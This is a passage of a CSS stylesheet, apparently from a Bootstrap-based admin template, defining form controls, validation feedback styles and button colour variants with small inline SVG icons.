.form-switch .form-check-input:focus {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%2395b4db'/%3e%3c/svg%3e");
}
.form-switch .form-check-input:checked {
  background-position: right center;
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e");
}

.form-check-inline {
  display: inline-block;
  margin-right: 1rem;
}

.btn-check {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.btn-check[disabled] + .btn, .btn-check:disabled + .btn {
  pointer-events: none;
  -webkit-filter: none;
          filter: none;
  opacity: 0.4;
}

.form-range {
  width: 100%;
  height: 1.5rem;
  padding: 0;
  background-color: transparent;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
}
.form-range:focus {
  outline: 0;
}
.form-range:focus::-webkit-slider-thumb {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-range:focus::-moz-range-thumb {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-range::-moz-focus-outer {
  border: 0;
}
.form-range::-webkit-slider-thumb {
  width: 1rem;
  height: 1rem;
  margin-top: -0.25rem;
  background-color: #2a69b7;
  border: 0;
  border-radius: 1rem;
  -webkit-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  -webkit-appearance: none;
          appearance: none;
}
@media (prefers-reduced-motion: reduce) {
  .form-range::-webkit-slider-thumb {
    -webkit-transition: none;
    transition: none;
  }
}
.form-range::-webkit-slider-thumb:active {
  background-color: #bfd2e9;
}
.form-range::-webkit-slider-runnable-track {
  width: 100%;
  height: 0.5rem;
  color: transparent;
  cursor: pointer;
  background-color: #dee2e6;
  border-color: transparent;
  border-radius: 1rem;
}
.form-range::-moz-range-thumb {
  width: 1rem;
  height: 1rem;
  background-color: #2a69b7;
  border: 0;
  border-radius: 1rem;
  -moz-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  -moz-appearance: none;
       appearance: none;
}
@media (prefers-reduced-motion: reduce) {
  .form-range::-moz-range-thumb {
    -moz-transition: none;
    transition: none;
  }
}
.form-range::-moz-range-thumb:active {
  background-color: #bfd2e9;
}
.form-range::-moz-range-track {
  width: 100%;
  height: 0.5rem;
  color: transparent;
  cursor: pointer;
  background-color: #dee2e6;
  border-color: transparent;
  border-radius: 1rem;
}
.form-range:disabled {
  pointer-events: none;
}
.form-range:disabled::-webkit-slider-thumb {
  background-color: #adb5bd;
}
.form-range:disabled::-moz-range-thumb {
  background-color: #adb5bd;
}

.form-floating {
  position: relative;
}
.form-floating > .form-control,
.form-floating > .form-select,
.form-floating > .custom-select {
  height: calc(3.5rem + 2px);
  line-height: 1.25;
}
.form-floating > label {
  position: absolute;
  top: 0;
  left: 0;
  height: 100%;
  padding: 1rem 1rem;
  pointer-events: none;
  border: 1px solid transparent;
  -webkit-transform-origin: 0 0;
          transform-origin: 0 0;
  transition: opacity 0.1s ease-in-out, -webkit-transform 0.1s ease-in-out;
  transition: opacity 0.1s ease-in-out, transform 0.1s ease-in-out;
  transition: opacity 0.1s ease-in-out, transform 0.1s ease-in-out, -webkit-transform 0.1s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-floating > label {
    transition: none;
  }
}
.form-floating > .form-control {
  padding: 1rem 1rem;
}
.form-floating > .form-control::-webkit-input-placeholder {
  color: transparent;
}
.form-floating > .form-control::-moz-placeholder {
  color: transparent;
}
.form-floating > .form-control:-ms-input-placeholder {
  color: transparent;
}
.form-floating > .form-control::-ms-input-placeholder {
  color: transparent;
}
.form-floating > .form-control::placeholder {
  color: transparent;
}
.form-floating > .form-control:not(:-moz-placeholder-shown) {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:not(:-ms-input-placeholder) {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:focus, .form-floating > .form-control:not(:placeholder-shown) {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:-webkit-autofill {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-select, .form-floating > .custom-select {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:not(:-moz-placeholder-shown) ~ label {
  opacity: 0.65;
  transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}
.form-floating > .form-control:not(:-ms-input-placeholder) ~ label {
  opacity: 0.65;
  transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}
.form-floating > .form-control:focus ~ label,
.form-floating > .form-control:not(:placeholder-shown) ~ label,
.form-floating > .form-select ~ label,
.form-floating > .custom-select ~ label {
  opacity: 0.65;
  -webkit-transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
          transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}
.form-floating > .form-control:-webkit-autofill ~ label {
  opacity: 0.65;
  -webkit-transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
          transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}

.input-group {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
  width: 100%;
}
.input-group > .form-control,
.input-group > .form-select,
.input-group > .custom-select {
  position: relative;
  flex: 1 1 auto;
  width: 1%;
  min-width: 0;
}
.input-group > .form-control:focus,
.input-group > .form-select:focus,
.input-group > .custom-select:focus {
  z-index: 3;
}
.input-group .btn {
  position: relative;
  z-index: 2;
}
.input-group .btn:focus {
  z-index: 3;
}

.input-group-text {
  display: flex;
  align-items: center;
  padding: 0.5rem 1rem;
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--white);
  text-align: center;
  white-space: nowrap;
  background-color: #132f53;
  border: 1px solid var(--template-bg-dark);
  border-radius: 0.25rem;
}

.input-group-lg > .form-control,
.input-group-lg > .form-select,
.input-group-lg > .custom-select,
.input-group-lg > .input-group-text,
.input-group-lg > .btn {
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  border-radius: 0.3rem;
}

.input-group-sm > .form-control,
.input-group-sm > .form-select,
.input-group-sm > .custom-select,
.input-group-sm > .input-group-text,
.input-group-sm > .btn {
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
  border-radius: 0.2rem;
}

.input-group-lg > .form-select, .input-group-lg > .custom-select,
.input-group-sm > .form-select,
.input-group-sm > .custom-select {
  padding-right: 4rem;
}

.input-group:not(.has-validation) > :not(:last-child):not(.dropdown-toggle):not(.dropdown-menu),
.input-group:not(.has-validation) > .dropdown-toggle:nth-last-child(n+3) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group.has-validation > :nth-last-child(n+3):not(.dropdown-toggle):not(.dropdown-menu),
.input-group.has-validation > .dropdown-toggle:nth-last-child(n+4) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group > :not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback) {
  margin-left: -1px;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.valid-feedback {
  display: none;
  width: 100%;
  margin-top: 0.25rem;
  font-size: 0.875em;
  color: #457d54;
}

.valid-tooltip {
  position: absolute;
  top: 100%;
  z-index: 5;
  display: none;
  max-width: 100%;
  padding: 0.25rem 0.5rem;
  margin-top: 0.1rem;
  font-size: 0.8rem;
  color: #fff;
  background-color: rgba(69, 125, 84, 0.9);
  border-radius: 0.25rem;
}

.was-validated :valid ~ .valid-feedback,
.was-validated :valid ~ .valid-tooltip,
.is-valid ~ .valid-feedback,
.is-valid ~ .valid-tooltip {
  display: block;
}

.was-validated .form-control:valid, .form-control.is-valid {
  border-color: #457d54;
  padding-right: calc(1.5em + 1rem);
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");
  background-repeat: no-repeat;
  background-position: right calc(0.375em + 0.25rem) center;
  background-size: calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-control:valid:focus, .form-control.is-valid:focus {
  border-color: #457d54;
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.25);
}

.was-validated textarea.form-control:valid, textarea.form-control.is-valid {
  padding-right: calc(1.5em + 1rem);
  background-position: top calc(0.375em + 0.25rem) right calc(0.375em + 0.25rem);
}

.was-validated .form-select:valid, .was-validated .custom-select:valid, .form-select.is-valid, .is-valid.custom-select {
  border-color: #457d54;
}
.was-validated .form-select:valid:not([multiple]):not([size]), .was-validated .custom-select:valid:not([multiple]):not([size]), .was-validated .form-select:valid:not([multiple])[size="1"], .was-validated .custom-select:valid:not([multiple])[size="1"], .form-select.is-valid:not([multiple]):not([size]), .is-valid.custom-select:not([multiple]):not([size]), .form-select.is-valid:not([multiple])[size="1"], .is-valid.custom-select:not([multiple])[size="1"] {
  padding-right: 5.5rem;
  background-image: url("../images/select-bg.svg"), url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");
  background-position: right 1rem center, center right 3rem;
  background-size: 116rem, calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-select:valid:focus, .was-validated .custom-select:valid:focus, .form-select.is-valid:focus, .is-valid.custom-select:focus {
  border-color: #457d54;
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.25);
}

.was-validated .form-check-input:valid, .form-check-input.is-valid {
  border-color: #457d54;
}
.was-validated .form-check-input:valid:checked, .form-check-input.is-valid:checked {
  background-color: #457d54;
}
.was-validated .form-check-input:valid:focus, .form-check-input.is-valid:focus {
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.25);
}
.was-validated .form-check-input:valid ~ .form-check-label, .form-check-input.is-valid ~ .form-check-label {
  color: #457d54;
}

.form-check-inline .form-check-input ~ .valid-feedback {
  margin-left: 0.5em;
}

.was-validated .input-group .form-control:valid, .input-group .form-control.is-valid,
.was-validated .input-group .form-select:valid,
.was-validated .input-group .custom-select:valid,
.input-group .form-select.is-valid,
.input-group .is-valid.custom-select {
  z-index: 1;
}
.was-validated .input-group .form-control:valid:focus, .input-group .form-control.is-valid:focus,
.was-validated .input-group .form-select:valid:focus,
.was-validated .input-group .custom-select:valid:focus,
.input-group .form-select.is-valid:focus,
.input-group .is-valid.custom-select:focus {
  z-index: 3;
}

.invalid-feedback {
  display: none;
  width: 100%;
  margin-top: 0.25rem;
  font-size: 0.875em;
  color: #c52827;
}

.invalid-tooltip {
  position: absolute;
  top: 100%;
  z-index: 5;
  display: none;
  max-width: 100%;
  padding: 0.25rem 0.5rem;
  margin-top: 0.1rem;
  font-size: 0.8rem;
  color: #fff;
  background-color: rgba(197, 40, 39, 0.9);
  border-radius: 0.25rem;
}

.was-validated :invalid ~ .invalid-feedback,
.was-validated :invalid ~ .invalid-tooltip,
.is-invalid ~ .invalid-feedback,
.is-invalid ~ .invalid-tooltip {
  display: block;
}

.was-validated .form-control:invalid, .form-control.is-invalid {
  border-color: #c52827;
  padding-right: calc(1.5em + 1rem);
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 12 12' width='12' height='12' fill='none' stroke='%23c52827'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3e%3c/svg%3e");
  background-repeat: no-repeat;
  background-position: right calc(0.375em + 0.25rem) center;
  background-size: calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-control:invalid:focus, .form-control.is-invalid:focus {
  border-color: #c52827;
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.25);
}

.was-validated textarea.form-control:invalid, textarea.form-control.is-invalid {
  padding-right: calc(1.5em + 1rem);
  background-position: top calc(0.375em + 0.25rem) right calc(0.375em + 0.25rem);
}

.was-validated .form-select:invalid, .was-validated .custom-select:invalid, .form-select.is-invalid, .is-invalid.custom-select {
  border-color: #c52827;
}
.was-validated .form-select:invalid:not([multiple]):not([size]), .was-validated .custom-select:invalid:not([multiple]):not([size]), .was-validated .form-select:invalid:not([multiple])[size="1"], .was-validated .custom-select:invalid:not([multiple])[size="1"], .form-select.is-invalid:not([multiple]):not([size]), .is-invalid.custom-select:not([multiple]):not([size]), .form-select.is-invalid:not([multiple])[size="1"], .is-invalid.custom-select:not([multiple])[size="1"] {
  padding-right: 5.5rem;
  background-image: url("../images/select-bg.svg"), url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 12 12' width='12' height='12' fill='none' stroke='%23c52827'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3e%3c/svg%3e");
  background-position: right 1rem center, center right 3rem;
  background-size: 116rem, calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-select:invalid:focus, .was-validated .custom-select:invalid:focus, .form-select.is-invalid:focus, .is-invalid.custom-select:focus {
  border-color: #c52827;
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.25);
}

.was-validated .form-check-input:invalid, .form-check-input.is-invalid {
  border-color: #c52827;
}
.was-validated .form-check-input:invalid:checked, .form-check-input.is-invalid:checked {
  background-color: #c52827;
}
.was-validated .form-check-input:invalid:focus, .form-check-input.is-invalid:focus {
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.25);
}
.was-validated .form-check-input:invalid ~ .form-check-label, .form-check-input.is-invalid ~ .form-check-label {
  color: #c52827;
}

.form-check-inline .form-check-input ~ .invalid-feedback {
  margin-left: 0.5em;
}

.was-validated .input-group .form-control:invalid, .input-group .form-control.is-invalid,
.was-validated .input-group .form-select:invalid,
.was-validated .input-group .custom-select:invalid,
.input-group .form-select.is-invalid,
.input-group .is-invalid.custom-select {
  z-index: 2;
}
.was-validated .input-group .form-control:invalid:focus, .input-group .form-control.is-invalid:focus,
.was-validated .input-group .form-select:invalid:focus,
.was-validated .input-group .custom-select:invalid:focus,
.input-group .form-select.is-invalid:focus,
.input-group .is-invalid.custom-select:focus {
  z-index: 3;
}

.btn {
  display: inline-block;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  text-align: center;
  vertical-align: middle;
  cursor: pointer;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  background-color: transparent;
  border: 1px solid transparent;
  padding: 0.5rem 1rem;
  font-size: 1rem;
  border-radius: 0.25rem;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .btn {
    transition: none;
  }
}
.btn:hover {
  color: var(--template-text-dark);
}
.btn-check:focus + .btn, .btn:focus {
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.btn:disabled, .btn.disabled, fieldset:disabled .btn {
  pointer-events: none;
  opacity: 0.4;
}

.btn-primary {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-primary:hover {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
}
.btn-check:focus + .btn-primary, .btn-primary:focus {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-check:checked + .btn-primary, .btn-check:active + .btn-primary, .btn-primary:active, .btn-primary.active, .show > .btn-primary.dropdown-toggle {
  color: #fff;
  background-color: #0f2642;
  border-color: #0e233e;
}
.btn-check:checked + .btn-primary:focus, .btn-check:active + .btn-primary:focus, .btn-primary:active:focus, .btn-primary.active:focus, .show > .btn-primary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-primary:disabled, .btn-primary.disabled {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}

.btn-secondary {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-secondary:hover {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
}
.btn-check:focus + .btn-secondary, .btn-secondary:focus {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-check:checked + .btn-secondary, .btn-check:active + .btn-secondary, .btn-secondary:active, .btn-secondary.active, .show > .btn-secondary.dropdown-toggle {
  color: #fff;
  background-color: #3a4046;
  border-color: #373c41;
}
.btn-check:checked + .btn-secondary:focus, .btn-check:active + .btn-secondary:focus, .btn-secondary:active:focus, .btn-secondary.active:focus, .show > .btn-secondary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-secondary:disabled, .btn-secondary.disabled {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}

.btn-success {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}
.btn-success:hover {
  color: #fff;
  background-color: #3b6a47;
  border-color: #376443;
}
.btn-check:focus + .btn-success, .btn-success:focus {
  color: #fff;
  background-color: #3b6a47;
  border-color: #376443;
  box-shadow: 0 0 0 0.25rem rgba(97, 145, 110, 0.5);
}
.btn-check:checked + .btn-success, .btn-check:active + .btn-success, .btn-success:active, .btn-success.active, .show > .btn-success.dropdown-toggle {
  color: #fff;
  background-color: #376443;
  border-color: #345e3f;
}
.btn-check:checked + .btn-success:focus, .btn-check:active + .btn-success:focus, .btn-success:active:focus, .btn-success.active:focus, .show > .btn-success.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(97, 145, 110, 0.5);
}
.btn-success:disabled, .btn-success.disabled {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}

.btn-info {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-info:hover {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
}
.btn-check:focus + .btn-info, .btn-info:focus {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-check:checked + .btn-info, .btn-check:active + .btn-info, .btn-info:active, .btn-info.active, .show > .btn-info.dropdown-toggle {
  color: #fff;
  background-color: #225493;
  border-color: #204f8a;
}
.btn-check:checked + .btn-info:focus, .btn-check:active + .btn-info:focus, .btn-info:active:focus, .btn-info.active:focus, .show > .btn-info.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-info:disabled, .btn-info.disabled {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}

.btn-warning {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}
.btn-warning:hover {
  color: #000;
  background-color: #ffc037;
  border-color: #ffbc2c;
}
.btn-check:focus + .btn-warning, .btn-warning:focus {
  color: #000;
  background-color: #ffc037;
  border-color: #ffbc2c;
  box-shadow: 0 0 0 0.25rem rgba(217, 154, 17, 0.5);
}
.btn-check:checked + .btn-warning, .btn-check:active + .btn-warning, .btn-warning:active, .btn-warning.active, .show > .btn-warning.dropdown-toggle {
  color: #000;
  background-color: #ffc443;
  border-color: #ffbc2c;
}
.btn-check:checked + .btn-warning:focus, .btn-check:active + .btn-warning:focus, .btn-warning:active:focus, .btn-warning.active:focus, .show > .btn-warning.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(217, 154, 17, 0.5);
}
.btn-warning:disabled, .btn-warning.disabled {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}

.btn-danger {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}
.btn-danger:hover {
  color: #fff;
  background-color: #a72221;
  border-color: #9e201f;
}
.btn-check:focus + .btn-danger, .btn-danger:focus {
  color: #fff;
  background-color: #a72221;
  border-color: #9e201f;
  box-shadow: 0 0 0 0.25rem rgba(206, 72, 71, 0.5);
}
.btn-check:checked + .btn-danger, .btn-check:active + .btn-danger, .btn-danger:active, .btn-danger.active, .show > .btn-danger.dropdown-toggle {
  color: #fff;
  background-color: #9e201f;
  border-color: #941e1d;
}
.btn-check:checked + .btn-danger:focus, .btn-check:active + .btn-danger:focus, .btn-danger:active:focus, .btn-danger.active:focus, .show > .btn-danger.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(206, 72, 71, 0.5);
}
.btn-danger:disabled, .btn-danger.disabled {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}

.btn-light {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-light:hover {
  color: #000;
  background-color: #f9fafb;
  border-color: #f9fafb;
}
.btn-check:focus + .btn-light, .btn-light:focus {
  color: #000;
  background-color: #f9fafb;
  border-color: #f9fafb;
  box-shadow: 0 0 0 0.25rem rgba(211, 212, 213, 0.5);
}
.btn-check:checked + .btn-light, .btn-check:active + .btn-light, .btn-light:active, .btn-light.active, .show > .btn-light.dropdown-toggle {
  color: #000;
  background-color: #f9fafb;
  border-color: #f9fafb;
}
.btn-check:checked + .btn-light:focus, .btn-check:active + .btn-light:focus, .btn-light:active:focus, .btn-light.active:focus, .show > .btn-light.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(211, 212, 213, 0.5);
}
.btn-light:disabled, .btn-light.disabled {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}

.btn-dark {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}
.btn-dark:hover {
  color: #fff;
  background-color: #1c1f23;
  border-color: #1a1e21;
}
.btn-check:focus + .btn-dark, .btn-dark:focus {
  color: #fff;
  background-color: #1c1f23;
  border-color: #1a1e21;
  box-shadow: 0 0 0 0.25rem rgba(66, 70, 73, 0.5);
}
.btn-check:checked + .btn-dark, .btn-check:active + .btn-dark, .btn-dark:active, .btn-dark.active, .show > .btn-dark.dropdown-toggle {
  color: #fff;
  background-color: #1a1e21;
  border-color: #191c1f;
}
.btn-check:checked + .btn-dark:focus, .btn-check:active + .btn-dark:focus, .btn-dark:active:focus, .btn-dark.active:focus, .show > .btn-dark.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(66, 70, 73, 0.5);
}
.btn-dark:disabled, .btn-dark.disabled {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}

.btn-atum-link-color {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-atum-link-color:hover {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
}
.btn-check:focus + .btn-atum-link-color, .btn-atum-link-color:focus {
  color: #fff;
  background-color: #24599c;
  border-color: #225493;
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-check:checked + .btn-atum-link-color, .btn-check:active + .btn-atum-link-color, .btn-atum-link-color:active, .btn-atum-link-color.active, .show > .btn-atum-link-color.dropdown-toggle {
  color: #fff;
  background-color: #225493;
  border-color: #204f8a;
}
.btn-check:checked + .btn-atum-link-color:focus, .btn-check:active + .btn-atum-link-color:focus, .btn-atum-link-color:active:focus, .btn-atum-link-color.active:focus, .show > .btn-atum-link-color.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(74, 128, 195, 0.5);
}
.btn-atum-link-color:disabled, .btn-atum-link-color.disabled {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}

.btn-atum-text-dark {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-atum-text-dark:hover {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
}
.btn-check:focus + .btn-atum-text-dark, .btn-atum-text-dark:focus {
  color: #fff;
  background-color: #3e444a;
  border-color: #3a4046;
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-check:checked + .btn-atum-text-dark, .btn-check:active + .btn-atum-text-dark, .btn-atum-text-dark:active, .btn-atum-text-dark.active, .show > .btn-atum-text-dark.dropdown-toggle {
  color: #fff;
  background-color: #3a4046;
  border-color: #373c41;
}
.btn-check:checked + .btn-atum-text-dark:focus, .btn-check:active + .btn-atum-text-dark:focus, .btn-atum-text-dark:active:focus, .btn-atum-text-dark.active:focus, .show > .btn-atum-text-dark.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(100, 106, 112, 0.5);
}
.btn-atum-text-dark:disabled, .btn-atum-text-dark.disabled {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}

.btn-action {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-action:hover {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
}
.btn-check:focus + .btn-action, .btn-action:focus {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-check:checked + .btn-action, .btn-check:active + .btn-action, .btn-action:active, .btn-action.active, .show > .btn-action.dropdown-toggle {
  color: #fff;
  background-color: #0f2642;
  border-color: #0e233e;
}
.btn-check:checked + .btn-action:focus, .btn-check:active + .btn-action:focus, .btn-action:active:focus, .btn-action.active:focus, .show > .btn-action.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(54, 78, 109, 0.5);
}
.btn-action:disabled, .btn-action.disabled {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}

.btn-error {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-error:hover {
  color: #fff;
  background-color: #320b0a;
  border-color: #2f0a0a;
}
.btn-check:focus + .btn-error, .btn-error:focus {
  color: #fff;
  background-color: #320b0a;
  border-color: #2f0a0a;
  box-shadow: 0 0 0 0.25rem rgba(88, 49, 48, 0.5);
}
.btn-check:checked + .btn-error, .btn-check:active + .btn-error, .btn-error:active, .btn-error.active, .show > .btn-error.dropdown-toggle {
  color: #fff;
  background-color: #2f0a0a;
  border-color: #2c0a09;
}
.btn-check:checked + .btn-error:focus, .btn-check:active + .btn-error:focus, .btn-error:active:focus, .btn-error.active:focus, .show > .btn-error.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(88, 49, 48, 0.5);
}
.btn-error:disabled, .btn-error.disabled {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}

.btn-alert-success {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}
.btn-alert-success:hover {
  color: #fff;
  background-color: #0d281c;
  border-color: #0c261a;
}
.btn-check:focus + .btn-alert-success, .btn-alert-success:focus {
  color: #fff;
  background-color: #0d281c;
  border-color: #0c261a;
  box-shadow: 0 0 0 0.25rem rgba(51, 78, 66, 0.5);
}
.btn-check:checked + .btn-alert-success, .btn-check:active + .btn-alert-success, .btn-alert-success:active, .btn-alert-success.active, .show > .btn-alert-success.dropdown-toggle {
  color: #fff;
  background-color: #0c261a;
  border-color: #0b2319;
}
.btn-check:checked + .btn-alert-success:focus, .btn-check:active + .btn-alert-success:focus, .btn-alert-success:active:focus, .btn-alert-success.active:focus, .show > .btn-alert-success.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.25rem rgba(51, 78, 66, 0.5);
}
.btn-alert-success:disabled, .btn-alert-success.disabled {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}

.btn-outline-primary {
  color: #132f53;
  border-color: #132f53;
}
.btn-outline-primary:hover {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:focus + .btn-outline-primary, .btn-outline-primary:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-check:checked + .btn-outline-primary, .btn-check:active + .btn-outline-primary, .btn-outline-primary:active, .btn-outline-primary.active, .btn-outline-primary.dropdown-toggle.show {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:checked + .btn-outline-primary:focus, .btn-check:active + .btn-outline-primary:focus, .btn-outline-primary:active:focus, .btn-outline-primary.active:focus, .btn-outline-primary.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-outline-primary:disabled, .btn-outline-primary.disabled {
  color: #132f53;
  background-color: transparent;
}

.btn-outline-secondary {
  color: #495057;
  border-color: #495057;
}
.btn-outline-secondary:hover {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:focus + .btn-outline-secondary, .btn-outline-secondary:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
